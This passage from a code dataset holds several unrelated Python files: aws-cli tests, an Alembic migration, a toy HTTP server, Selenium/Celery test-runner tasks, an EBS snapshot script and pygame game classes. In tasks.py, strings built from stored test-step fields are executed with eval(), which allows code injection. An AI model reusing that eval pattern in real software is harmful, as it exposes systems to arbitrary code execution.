test_list_runs_formatter_explicit_choice(\n self, list_formatter, json_formatter):\n command = ListRunsCommand(self.driver.session)\n command(['--pipeline-id', 'my-pipeline-id'],\n parsed_globals=FakeParsedArgs(\n region='us-east-1', output='json'))\n json_formatter.assert_called_once_with(\n 'list-runs', self.expected_response)\n self.assertFalse(list_formatter.called)\n\n @mock.patch(JSON_FORMATTER_PATH)\n @mock.patch(LIST_FORMATTER_PATH)\n def test_list_runs_formatter_implicit_choice(\n self, list_formatter, json_formatter):\n\n command = ListRunsCommand(self.driver.session)\n command(['--pipeline-id', 'my-pipeline-id'],\n parsed_globals=FakeParsedArgs(region='us-east-1'))\n list_formatter.assert_called_once_with(\n 'list-runs', self.expected_response)\n self.assertFalse(json_formatter.called)\n\n\nclass TestHelpOutput(BaseAWSHelpOutputTest):\n def test_list_runs_help_output(self):\n self.driver.main(['datapipeline', 'get-pipeline-definition', 'help'])\n self.assert_contains('pipeline definition')\n # The previous API docs should not be in the output\n 
self.assert_not_contains('pipelineObjects')\n","repo_name":"aws/aws-cli","sub_path":"tests/unit/customizations/datapipeline/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":7400,"program_lang":"python","lang":"en","doc_type":"code","stars":14456,"dataset":"github-code","pt":"79"}
+{"seq_id":"3619254496","text":"\"\"\"Update model classes\n\nRevision ID: 6e820d07d39c\nRevises: e1ce83ce683a\nCreate Date: 2022-05-17 19:53:31.183155\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6e820d07d39c'\ndown_revision = 'e1ce83ce683a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('users', sa.Column('subscriber_id', sa.Integer(), nullable=True))\n    op.create_foreign_key(None, 'users', 'subscribers', ['subscriber_id'], ['id'])\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_constraint(None, 'users', type_='foreignkey')\n    op.drop_column('users', 'subscriber_id')\n    # ### end Alembic commands ###\n","repo_name":"JosephatNgugi/Blog","sub_path":"migrations/versions/6e820d07d39c_update_model_classes.py","file_name":"6e820d07d39c_update_model_classes.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"3045332401","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\nimport json\n# import sys\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        # import pdb; pdb.set_trace()\n        parsed_path = urlparse(self.path)\n        parsed_qs = parse_qs(parsed_path.query)\n\n        if parsed_path.path == '/':\n            self.send_response(200)\n            self.end_headers()\n            self.wfile.write(b'You did a thing!')\n            return\n\n        elif parsed_path.path == '/test':\n            try:\n                cat = json.loads(parsed_qs['category'][0])\n            except KeyError:\n                self.send_response(400)\n                self.end_headers()\n                self.wfile.write(b'You did a bad thing')\n                return\n            \n            self.send_response(200)\n            self.end_headers()\n            self.wfile.write(b'We did the thing with the qs')\n\n        else:\n            self.send_response(404)\n            self.end_headers()\n            self.wfile.write(b'Not found')\n\n    def do_POST(self):\n        self.send_response(200)\n        self.end_headers()\n        self.wfile.write(b'POST received')\n\n\ndef create_server():\n    return HTTPServer(('127.0.0.1', 3000), SimpleHTTPRequestHandler)\n\n\ndef run_forever():\n    server = create_server()\n\n    try:\n        print('Starting server on port 3000')\n        server.serve_forever()\n    except KeyboardInterrupt:\n        server.shutdown()\n        server.server_close()\n\n\nif __name__ == '__main__':\n    run_forever()\n","repo_name":"steveflys/sockets","sub_path":"protocols/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"43882685012","text":"# README:\n# This user/mode relies on saving variables to PVD so that they're retrievable on power cycles.\n# On a first boot of the user/mode you may see an error stating 'Error while request to save PCE variables:\n# Error returned from PCE Variable file open routine'. This error is produced because the PCEVarList.cfg file\n# located in /config/mode/caps/*MODENAME*/ is trying to load variables (e.g. ADAPT_FLAG) which don't currently \n# exist, and therefore cannot be loaded. 
To resolve this issue, run this script to initialise the variables so\n# CAPS can find them. You should only need to run this once. If you're seeing the error often, contact CBM. \n# 1: Open PuTTY and navigate to the mode's SLAVE FOLDER:\n# a) cd /\n# b) cd /config/mode/caps/*MODENAME*/SLAVE/ \n# 2: Type the following:\n# a) python initialise.py\n# 3: A message should state that initialise is running, and then a second message stating that it has completed.\n# 4: Close PuTTY and power cycle the device. Null variables will now exist in the system and CAPS should operate normally.\n\nimport pcepy.pce as pce\nimport numpy as np\n\n# Number of modes/classes.\nnumClasses = 5\n# Number of modes/classes.\nnumModels = 5\n# Number of EMG channels.\nnumEMG = 6\n# Number of features. (10 for '47')\nfeatNum = 4\n# Matrix size.\nmatSize = numEMG * featNum\n# Sample threshold\nsampThres = 100\n# Number of samples in one frame \nwindow = 200\n\nprint('RUNNING INITIALISE...')\n\n# Common variables\npce.set_var('CTRL',1)\npce.set_var('MODE', -1)\npce.set_var('CUR_VAL', 0)\npce.set_var('THRESH_VAL', 0)\npce.set_var('NOISE', 0)\npce.set_var('NOISE_CH', 0)\npce.set_var('NOISE_SCALE', 0)\npce.set_var('COLLECT', 2)\npce.set_var('IN_TRIAL', 0)\npce.set_var('MVC_R', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('MVC_T', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('MVC', np.zeros((numClasses, numEMG), dtype=float, order='F'))\npce.set_var('N_C', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('N_R', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('N_T', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('DAQ_NOISY', np.zeros((numEMG, window), dtype=float, order='F'))\npce.set_var('FEAT_RAW', np.zeros((1, matSize), dtype=float, order='F'))\npce.set_var('FEAT_NOISY', np.zeros((1, matSize), dtype=float, order='F'))\n\n\n# Variables for PR only\npce.set_var('NEW_CLASS', 0)\npce.set_var('OLD_CLASS', 0)\npce.set_var('VEL', 0)\npce.set_var('RAMP', 1)\npce.set_var('CLASS_ACTIVE', 0)\npce.set_var('CLASS_EST', -1)\npce.set_var('OUT_MAP', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('WG_ADAPT', np.zeros((matSize, numClasses), dtype=float, order='F'))\npce.set_var('CG_ADAPT', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('MID', np.zeros((numClasses, 1), dtype=float, order='F'))\n\nfor i in range(0, numClasses):\n pce.set_var('COV' + str(i), np.zeros((matSize, matSize), dtype=float, order='F'))\n pce.set_var('MN' + str(i), np.zeros((1, matSize), dtype=float, order='F'))\n pce.set_var('CLASS_MAV' + str(i), 0)\n\n# Variables for regression only\npce.set_var('Y_LABEL',-1)\npce.set_var('X', np.zeros((sampThres, matSize + 1), dtype=float, order='F'))\npce.set_var('Y', np.zeros((sampThres, 1), dtype=float, order='F'))\npce.set_var('Y_EST', np.zeros((numModels,1), dtype=float, order='F'))\npce.set_var('ZERO_FLAGS', np.zeros((numModels,numModels), dtype=float, order='F'))\npce.set_var('W', np.zeros((matSize + 1, numModels), dtype=float, order='F'))\nfor i in range(1, numModels):\n pce.set_var('XX' + str(i), np.zeros((matSize + 1, matSize + 1), dtype=float, order='F'))\n pce.set_var('XY' + str(i), np.zeros((matSize + 1, 1), dtype=float, order='F'))\n \nprint('INITIALISE 
COMPLETE')","repo_name":"yuniteh/PRvLR","sub_path":"embedded/ctrl_beta/SLAVE/initialise.py","file_name":"initialise.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7196911458","text":"import random\r\n\r\n\r\nrc = random.choice\r\n\r\netunimet = \"Pekka Pirjo Paula Arto Kimmo Liisa Maija Lasse Leena\".split()\r\nsukunimet = \"Virtanen Lahtinen Hakanen Järvinen Jokinen Saarinen\".split()\r\n\r\netunimi = rc(etunimet)\r\nsukunimi = rc(sukunimet)\r\nika = random.randint(10,99)\r\n\r\nprint(\"Moi, nimeni on\", etunimi, sukunimi, \"ja olen\", ika, \"vuotta vanha.\")","repo_name":"3liasP/Programming-Basics","sub_path":"Tutoriaalit 1/11. Tulosta nimet ja ika.py","file_name":"11. Tulosta nimet ja ika.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43884344644","text":"import os\nimport sys\nimport tempfile\n\nfrom rez.tests.util import TestBase\nfrom rez.utils import py23\n\n\nclass TestLoadModuleFromFile(TestBase):\n def test_load_module(self):\n \"\"\"Ensure that the imported module does not show up in sys.modules\"\"\"\n # Random chars are used in the module name to ensure that the module name is unique\n # and the test won't fail because some other module with the same name\n # shows up in sys.modules\n module = 'utils_test_7cd3a335'\n\n filename = '{0}.py'.format(module)\n tmpdir = tempfile.mkdtemp(prefix=\"rez_selftest_\")\n\n with open(os.path.join(tmpdir, filename), 'w') as fd:\n fd.write('')\n\n py23.load_module_from_file(\n module,\n os.path.join(tmpdir, filename)\n )\n self.assertEqual(sys.modules.get(module), None, msg='Module was found in sys.modules')\n","repo_name":"AcademySoftwareFoundation/rez","sub_path":"src/rez/tests/test_utils_py23.py","file_name":"test_utils_py23.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":844,"dataset":"github-code","pt":"79"} +{"seq_id":"568073674","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nfrom . 
import models\n\n\nimport os\nimport time\nimport traceback\nfrom selenium import webdriver\nimport time\nfrom .pic_path import get_pic_path\n\n\ndef get_element(driver,locator_method,locator_exp):\n element = driver.find_element( locator_method, locator_exp)\n return element\n\ndef open_browser(browser_name):\n \n if \"ie\" in browser_name.lower():\n driver = webdriver.Ie(executable_path=\"e:\\\\IEDriverServer\")\n elif \"chrome\" in browser_name.lower():\n driver = webdriver.Chrome(executable_path=\"e:\\\\chromedriver\")\n else:\n driver = webdriver.Firefox(executable_path=\"e:\\\\geckodriver\")\n return driver\n\ndef visit(driver,url):\n \n driver.get(url)\n\ndef input(driver,locator_method,locator_exp,content):\n #global driver\n element = get_element(driver,locator_method,locator_exp)\n element.send_keys(content)\n\ndef click(driver,locator_method,locator_exp):\n #global driver\n element = get_element(driver,locator_method,locator_exp)\n element.click()\n\ndef sleep(driver,seconds):\n time.sleep(float(seconds))\n\ndef assert_word(driver,expected_word):\n #global driver\n assert expected_word in driver.page_source\n\ndef switch_to(driver,locator_method,locator_exp):\n \n element = get_element(driver,locator_method,locator_exp)\n driver.switch_to.frame(element)\n\ndef switch_back(driver):\n \n driver.switch_to.default_content()\n\ndef quit(driver):\n \n driver.quit()\n\ndef take_pic(driver,file_path):\n print(\"***************\",driver)\n try:\n '''\n 调用get_screenshot_as_file(file_path)方法,对浏览器当前打开页面\n 进行截图,并保为C盘下的screenPicture.png文件。\n '''\n result = driver.get_screenshot_as_file(file_path)\n print(result)\n except IOError as e:\n print(e)\n\n\n'''\n@shared_task\ndef add(x, y):\n return x + y\n'''\n\n@shared_task\ndef mul(x, y):\n return x * y\n\n\n@shared_task\ndef web_test_task(execute_id,testcase_id):\n test_steps = models.CaseStep.objects.filter(test_case=testcase_id)\n execute_record = models.TestCaseExecuteRecord.objects.get(id=execute_id)\n execute_record.execute_start_time=time.strftime(\"%Y-%m-%d %H:%M:%S\")\n execute_record.save()\n steps = []\n driver = \"\"\n for test_step in test_steps:\n temp = []\n print(\"---------\",test_step.id,test_step.key_word,test_step.locator_method,\n test_step.locator_exp,test_step.test_data)\n temp.append(test_step.id)\n temp.append(test_step.key_word)\n temp.append(test_step.locator_method)\n temp.append(test_step.locator_exp)\n temp.append(test_step.test_data)\n steps.append(temp)\n \n for test_step in steps:\n key_word = test_step[1].name\n locator_method = test_step[2]\n locator_exp = test_step[3]\n value = test_step[4]\n test_step_result=\"\"\n test_step_exception_info=\"\"\n test_step_capture_screen=\"\"\n case_step_info=\"\"\n command=\"\"\n try:\n if key_word==\"open_browser\":\n driver = open_browser(value)\n print(\"启动浏览器%s成功\" %value)\n test_step_result=\"成功\"\n step_id=test_step[0]\n case_step_info = models.CaseStep.objects.get(id=step_id)\n models.TestCaseStepExecuteRecord.objects.create(\n test_case_execute_record=execute_record,case_step=case_step_info,result=test_step_result)\n continue\n if locator_method is None and value is not None:\n command = '''%s(driver,\"%s\")''' %(key_word,value)\n elif locator_method is None and value is None :\n command = '''%s(driver)''' %(key_word)\n elif locator_method is not None and value is not None:\n print(\"****************\")\n command = '''%s(driver,\"%s\",\"%s\",\"%s\")''' %(key_word,locator_method,locator_exp,value)\n elif locator_method is not None and value is None:\n 
print(\"----------------\")\n command = '''%s(driver,\"%s\",\"%s\")''' %(key_word,locator_method,locator_exp)\n \n eval(command)\n #1/0\n print(\"执行测试步骤 %s 成功\" %command)\n test_step_result=\"成功\"\n except:\n print(\"执行测试步骤 %s 失败\" %command)\n traceback.print_exc()\n execute_record.exception_info=traceback.format_exc()\n test_step_exception_info=traceback.format_exc()\n execute_record.result=\"失败\"\n file_path = get_pic_path()[0]\n sava_path = get_pic_path()[1]\n take_pic(driver,file_path)\n execute_record.capture_screen = sava_path\n test_step_capture_screen=sava_path\n test_step_result=\"失败\"\n execute_record.save()\n try:\n driver.quit()\n except:\n print(\"关闭浏览器失败\") \n \n print(\"Done!\")\n #execute_record = models.ExecuteRecord.objects.get(execute_id=execute_id)\n step_id=test_step[0]\n case_step_info = models.CaseStep.objects.get(id=step_id)\n step_result=models.TestCaseStepExecuteRecord.objects.create(\n test_case_execute_record=execute_record,case_step=case_step_info,result=test_step_result,\n exception_info=test_step_exception_info,capture_screen=test_step_capture_screen)\n print(\"++++++++++++++\",step_result)\n if test_step_result==\"失败\":\n break\n else:\n execute_record.result=\"成功\"\n execute_record.save() \n \n print(\"done!!!!\") \n execute_record.status=1\n execute_record.execute_end_time=time.strftime(\"%Y-%m-%d %H:%M:%S\") \n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()).split(\".\")[0])\n execute_record.save()\n\n\n@shared_task\ndef web_suit_task(execute_id,testsuit_id):\n test_suit = models.TestSuit.objects.get(id=testsuit_id)\n test_suit_test_cases = models.TestSuitTestCases.objects.filter(test_suit=test_suit)\n test_suit_record=models.TestSuitExecuteRecord.objects.get(id=execute_id)\n test_suit_record.test_result = \"成功\"\n test_suit_record.execute_start_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n for test_suit_test_case in test_suit_test_cases:\n test_case = test_suit_test_case.test_case\n test_case_record = models.TestSuitTestCaseExecuteRecord.objects.create(test_suit_record=test_suit_record,test_case=test_case)\n test_steps = models.CaseStep.objects.filter(test_case=test_case)\n test_case_record.execute_start_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n test_case_record.save()\n print(\"***********$$$$\", test_steps, \"----$$$$$$\")\n steps = []\n driver = \"\"\n for test_step in test_steps:\n temp = []\n print(\"---------\", test_step.id, test_step.key_word, test_step.locator_method,\n test_step.locator_exp, test_step.test_data)\n temp.append(test_step.id)\n temp.append(test_step.key_word)\n temp.append(test_step.locator_method)\n temp.append(test_step.locator_exp)\n temp.append(test_step.test_data)\n steps.append(temp)\n \n for test_step in steps:\n step_id = models.CaseStep.objects.get(id=test_step[0])\n test_step_record=models.TestSuitTestStepExecuteRecord.objects.create(test_case_record=test_case_record,step_id=step_id)\n key_word = test_step[1].name\n # key_word = test_step[1].strip()\n print(\"________+++++++++++:\", key_word)\n locator_method = test_step[2]\n print(\"####\" * 10, type(locator_method))\n locator_exp = test_step[3]\n value = test_step[4]\n if key_word == \"open_browser\":\n driver = open_browser(value)\n print(\"启动浏览器%s成功\" % value)\n continue\n if locator_method is None and value is not None:\n command = '''%s(driver,\"%s\")''' % (key_word, value)\n elif locator_method is None and value is None:\n command = '''%s(driver)''' % (key_word)\n elif locator_method is not None and value is not None:\n 
print(\"****************\")\n command = '''%s(driver,\"%s\",\"%s\",\"%s\")''' % (key_word, locator_method, locator_exp, value)\n elif locator_method is not None and value is None:\n print(\"----------------\")\n command = '''%s(driver,\"%s\",\"%s\")''' % (key_word, locator_method, locator_exp)\n \n try:\n eval(command)\n print(\"执行测试步骤 %s 成功\" % command)\n #1/0\n test_step_record.result = \"成功\"\n test_step_record.save() \n except:\n test_step_record.result = \"失败\"\n test_case_record.test_result=\"失败\"\n test_suit_record.test_result=\"失败\"\n print(\"执行测试步骤 %s 失败\" % command)\n traceback.print_exc()\n test_step_record.exception_info = traceback.format_exc()\n test_case_record.exception_info = traceback.format_exc()\n file_path = get_pic_path()[0]\n sava_path = get_pic_path()[1]\n take_pic(driver, file_path)\n test_step_record.capture_screen = sava_path\n test_case_record.capture_screen = sava_path\n test_step_record.save() \n try:\n driver.quit()\n except:\n print(\"关闭浏览器失败\") \n break\n else:\n test_case_record.test_result = \"成功\"\n test_suit_record.save()\n test_case_record.execute_end_time = time.strftime(\"%Y-%m-%d %H:%M:%S\") \n test_case_record.status = 1\n test_case_record.save()\n test_suit_record.status=1\n test_suit_record.save()\n","repo_name":"taoxinbo/auto_test_platform","sub_path":"auto_test/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":10166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"530077494","text":"import pytest\n\nfrom apigateway.apps.support.api_sdk.distributors.pypi import PypiSourceDistributor\nfrom apigateway.apps.support.constants import ProgrammingLanguageEnum\n\n\n@pytest.fixture\ndef package_searcher(mocker):\n return mocker.MagicMock()\n\n\n@pytest.fixture\ndef package_searcher_result(mocker, package_searcher, faker):\n result = mocker.MagicMock(url=faker.url())\n package_searcher.search.return_value = result\n return result\n\n\n@pytest.fixture\ndef distributor(faker, mocker, sdk_context, settings, package_searcher):\n settings.PYPI_MIRRORS_CONFIG = {\n PypiSourceDistributor.repository: {\n \"index_url\": \"\",\n \"repository_url\": faker.url(),\n \"username\": faker.user_name(),\n \"password\": faker.password(),\n }\n }\n\n distributor = PypiSourceDistributor(\n context=sdk_context,\n )\n distributor.package_searcher = package_searcher\n\n return distributor\n\n\n@pytest.fixture\ndef sdist(tmpdir, sdk_context):\n dist = tmpdir.join(\"dist\")\n dist.mkdir()\n\n source_tar = dist.join(f\"{sdk_context.name}.tar.gz\")\n source_tar.write(\"\")\n return source_tar\n\n\n@pytest.fixture\ndef sdk_context(sdk_context):\n sdk_context.language = ProgrammingLanguageEnum.PYTHON\n return sdk_context\n\n\ndef test_pypirc(\n tmpdir, faker, output_dir, python_setup_script, python_setup_history, sdist, distributor: PypiSourceDistributor\n):\n distributor.distribute(output_dir, [sdist])\n\n pypirc_path = tmpdir.join(\".pypirc\")\n assert pypirc_path.exists()\n\n\ndef test_distribute(\n output_dir,\n sdk_context,\n python_setup_script,\n sdist,\n python_setup_history,\n distributor: PypiSourceDistributor,\n package_searcher_result,\n):\n result = distributor.distribute(output_dir, [sdist])\n\n python_setup_history = python_setup_history.read()\n assert f\"setup.py sdist upload -r {distributor.repository}\" in python_setup_history\n\n assert sdk_context.config[\"python\"][\"is_uploaded_to_pypi\"]\n assert sdk_context.config[\"python\"][\"repository\"] == distributor.repository\n assert 
result.url == package_searcher_result.url\n assert not result.is_local\n","repo_name":"TencentBlueKing/blueking-apigateway","sub_path":"src/dashboard/apigateway/apigateway/tests/apps/support/api_sdk/distributors/test_pypi.py","file_name":"test_pypi.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"79"} +{"seq_id":"72297871616","text":"import boto3\nimport json\nimport pandas as pd\nfrom pandas.io.json import json_normalize\n\nebs = boto3.client('ebs')\nec2 = boto3.client('ec2')\n\n# get sorted list of snapshots\nsnapshots = ec2.describe_snapshots(OwnerIds=['self'])\ndf = pd.DataFrame.from_dict(snapshots['Snapshots'])\ndf.sort_values(by=['OwnerId', \"VolumeId\", \"StartTime\"], inplace = True)\n\n# per volumeid lineage, get for each one changed blocks\ni = 0\nl = len(df.index)\nfirst = True\nblockSize = 524288\nfor index, row in df.iterrows():\n if i == l:\n break\n date = str(row['StartTime']).split('.',1)[0].split(' ')[0]\n time = str(row['StartTime']).split('.',1)[0].split(' ')[1]\n if first:\n v_prev = row['VolumeId']\n sid_prev = row['SnapshotId']\n print(date + ',' + time + ',' + v_prev + \",\" + 'snap-00000000000000000' + \",\" + sid_prev + \",\" + str(row['VolumeSize'] * 1024 * 1024 * 1024))\n first = False\n i = i + 1\n continue\n v = row['VolumeId']\n sid = row['SnapshotId']\n if v == v_prev:\n changed = len(ebs.list_changed_blocks(FirstSnapshotId = sid_prev,SecondSnapshotId = sid)['ChangedBlocks'])\n print(date + ',' + time + ',' + v + \",\" + sid_prev + \",\" + sid + \",\" + str(changed * blockSize))\n else:\n print(date + ',' + time + ',' + v + \",\" + 'snap-00000000000000000' + \",\" + sid + \",\" + str(row['VolumeSize'] * 1024 * 1024 * 1024))\n v_prev = v\n sid_prev = sid\n i = i + 1","repo_name":"akirsman/Snapshots","sub_path":"snapshotsSize.py","file_name":"snapshotsSize.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"27378580061","text":"#\r\n# models.py\r\n#\r\nimport pygame\r\nimport os\r\nimport math\r\nimport random\r\nfrom utils import scale_image\r\n\r\n# ___ MODEL VARIABLES\r\nplayer_scale = 0.75\r\nenemies_scale = 0.6\r\nitem_scale = 0.7\r\n\r\n# ___ Images\r\nsoldier_path = r'files/sprites/soldier/'\r\n\r\n\r\n# player class\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self, screen):\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n # Create list of images\r\n self.__list = []\r\n for file in os.listdir(soldier_path):\r\n img = pygame.image.load('./' + soldier_path + '/' + file)\r\n self.__list.append(scale_image(img, player_scale))\r\n\r\n self.image = self.__list[0]\r\n self.rect = self.image.get_rect()\r\n self.__saved_image = self.image\r\n\r\n self.rect.left = 0\r\n self.rect.top = 200\r\n self.__speed = 4\r\n\r\n # set the angle value\r\n self.__angle = 0\r\n\r\n def reset_speed(self):\r\n self.__speed = 4\r\n\r\n def increase_speed(self):\r\n self.__speed = 8\r\n\r\n def go_left(self, screen):\r\n if self.rect.left >= 0:\r\n self.rect.left -= self.__speed\r\n\r\n def go_right(self, screen):\r\n if self.rect.right <= screen.get_width():\r\n self.rect.right += self.__speed\r\n\r\n def go_up(self, screen):\r\n if self.rect.top >= 0:\r\n self.rect.top -= self.__speed\r\n\r\n def go_down(self, screen):\r\n if self.rect.bottom <= screen.get_height():\r\n self.rect.bottom += self.__speed\r\n\r\n def get_angle(self):\r\n return self.__angle\r\n\r\n def 
change_image(self, weapon):\r\n self.image = self.__list[weapon]\r\n self.__saved_image = self.image\r\n\r\n def rotate(self, mouse_pos):\r\n self.__angle = math.degrees(math.atan2(self.rect.centerx - mouse_pos[0], self.rect.centery - mouse_pos[1]))\r\n self.image = pygame.transform.rotate(self.__saved_image, self.__angle)\r\n self.rect = self.image.get_rect(center=self.rect.center)\r\n\r\n\r\nclass Alien(pygame.sprite.Sprite):\r\n def __init__(self, screen, speed, damage, hp, attack_speed, value, image, alien_type, player_pos):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.__screen = screen\r\n self.__speed = speed\r\n self.__default_speed = speed\r\n\r\n self.__damage = damage\r\n self.__hp = hp\r\n self.__attack_speed = attack_speed\r\n self.__value = value\r\n self.__alien_type = alien_type\r\n\r\n self.__move = True\r\n self.__count = (attack_speed - 1)\r\n\r\n self.__slow = False\r\n self.__slow_counter = 0\r\n\r\n self.image = image\r\n self.image = scale_image(self.image, enemies_scale)\r\n self.__saved_image = self.image\r\n self.rect = self.image.get_rect()\r\n\r\n self.spawn()\r\n self.rotate(player_pos)\r\n self.set_step_amount(player_pos)\r\n\r\n def reset_attack(self):\r\n self.__count = self.__attack_speed - 1\r\n\r\n def get_attack(self):\r\n self.__count += 1\r\n if self.__count == self.__attack_speed:\r\n self.__count = 0\r\n return True\r\n else:\r\n return False\r\n\r\n def get_alien_type(self):\r\n return self.__alien_type\r\n\r\n def get_damage(self):\r\n return self.__damage\r\n\r\n def get_value(self):\r\n return self.__value\r\n\r\n def damage_hp(self, damage):\r\n self.__hp -= damage\r\n if self.__hp > 0:\r\n return True\r\n else:\r\n return False\r\n\r\n def set_step_amount(self, player_pos):\r\n try:\r\n self.__distance = math.sqrt \\\r\n (pow(player_pos[0] - self.rect.centerx, 2) + pow(player_pos[1] - self.rect.centery, 2))\r\n self.__animation_steps = self.__distance / self.__speed\r\n self.__dx = (player_pos[0] - self.rect.centerx) / self.__animation_steps\r\n self.__dy = (player_pos[1] - self.rect.centery) / self.__animation_steps\r\n except:\r\n self.__dx = 0\r\n self.__dy = 0\r\n\r\n def move(self, boolval):\r\n self.__move = boolval\r\n\r\n def spawn(self):\r\n self.__spawn = random.randint(1, 3)\r\n if self.__spawn == 1:\r\n self.__x = random.randrange(0, -300, -30)\r\n self.__y = random.randint(0, self.__screen.get_height() - 100)\r\n elif self.__spawn == 2:\r\n self.__x = random.randint(self.__screen.get_width(), self.__screen.get_width() + 300)\r\n self.__y = random.randint(0, self.__screen.get_height() - 100)\r\n else:\r\n self.__x = random.randint(0, self.__screen.get_width())\r\n self.__y = random.randint(self.__screen.get_height(), self.__screen.get_height() + 300)\r\n\r\n self.rect.center = (self.__x, self.__y)\r\n\r\n def rotate(self, player_pos):\r\n self.__angle = math.degrees(math.atan2(self.rect.centerx - player_pos[0], self.rect.centery - player_pos[1]))\r\n self.image = pygame.transform.rotate(self.__saved_image, self.__angle)\r\n self.rect = self.image.get_rect(center=self.rect.center)\r\n\r\n def update(self):\r\n if self.__move:\r\n self.rect.centerx += self.__dx\r\n self.rect.centery += self.__dy\r\n if self.__slow:\r\n self.__slow_counter += 1\r\n if self.__slow_counter >= 400:\r\n self.__speed = self.__default_speed\r\n self.__slow_counter = 0\r\n self.__slow = False\r\n\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n def __init__(self, image, angle, player_pos, mouse_pos, speed, damage, double_damage):\r\n 
pygame.sprite.Sprite.__init__(self)\r\n\r\n        if double_damage:\r\n            self.__damage = damage * 2\r\n        else:\r\n            self.__damage = damage\r\n\r\n        self.__x = player_pos[0]\r\n        self.__y = player_pos[1]\r\n\r\n        self.__target_x = mouse_pos[0]\r\n        self.__target_y = mouse_pos[1]\r\n\r\n        if image:\r\n            self.image = image\r\n            self.image.convert()\r\n            self.rect = self.image.get_rect()\r\n            self.rect.center = (self.__x, self.__y)\r\n            self.image = pygame.transform.rotate(self.image, angle)\r\n            self.rect = self.image.get_rect(center=self.rect.center)\r\n        else:\r\n            self.image = pygame.Surface((5, 5))\r\n            self.image.fill((255, 0, 0))\r\n            self.image.set_alpha(0)\r\n            self.rect = self.image.get_rect()\r\n            self.rect.center = (self.__x, self.__y)\r\n\r\n        self.__distance = math.sqrt(pow(self.__target_x - self.__x, 2) + pow(self.__target_y - self.__y, 2))\r\n        self.__animation_steps = self.__distance / speed\r\n        self.__dx = (self.__target_x - self.__x) / self.__animation_steps\r\n        self.__dy = (self.__target_y - self.__y) / self.__animation_steps\r\n\r\n    def get_damage(self):\r\n        return self.__damage\r\n\r\n    def update(self):\r\n        self.rect.centerx += self.__dx\r\n        self.rect.centery += self.__dy\r\n        if self.rect.top < 0 or self.rect.bottom > 620 or self.rect.left < 0 or self.rect.right > 1280:\r\n            self.kill()\r\n\r\n\r\nclass StatusBar(pygame.sprite.Sprite):\r\n    def __init__(self, position, color1, color2, size, status1, status2, typeof, increase):\r\n        pygame.sprite.Sprite.__init__(self)\r\n\r\n        self.__colors = [color1, color2]\r\n        self.__size = size\r\n        self.__s1 = status1\r\n        self.__s2 = float(status2)\r\n        self.__m = size[0] * 100\r\n        self.__type = typeof\r\n        self.__increase = increase\r\n\r\n        self.image = pygame.Surface(size)\r\n        self.image.fill(color2)\r\n        pygame.draw.rect(self.image, color1, ((0, 0), (self.__s1 / self.__s2 * 100 * self.__m, self.__size[1])), 0)\r\n\r\n        self.rect = self.image.get_rect()\r\n        self.rect.left = position[0]\r\n        self.rect.top = position[1]\r\n\r\n    def set_position(self, position):\r\n        self.rect.left = position[0]\r\n        self.rect.top = position[1]\r\n\r\n    def set_status(self, current_status):\r\n        self.image.fill(self.__colors[1])\r\n        pygame.draw.rect(self.image, self.__colors[0], ((0, 0),\r\n                                                        (current_status / self.__s2 * 100 * self.__m, self.__size[1])), 0)\r\n\r\n    def get_reload(self):\r\n        if self.__s2 - self.__s1 < 0:\r\n            return True\r\n\r\n    def update(self):\r\n        if self.__type:\r\n            self.image.fill(self.__colors[1])\r\n            self.__s1 += self.__increase\r\n            pygame.draw.rect(self.image, self.__colors[0],\r\n                             ((0, 0), (self.__s1 / self.__s2 * 100 * self.__m, self.__size[1])), 0)\r\n\r\n            if self.__s2 - self.__s1 < -1:\r\n                self.kill()\r\n\r\n\r\nclass Text(pygame.sprite.Sprite):\r\n    def __init__(self, size, color, position, variables, message, alpha):\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.__font = pygame.font.Font(r\"files/fonts/space_font.ttf\", int(size/1.5))\r\n        self.__color = color\r\n        self.__position = position\r\n\r\n        if variables:\r\n            self.__variables = variables.split(',')\r\n            if len(self.__variables) > 3:\r\n                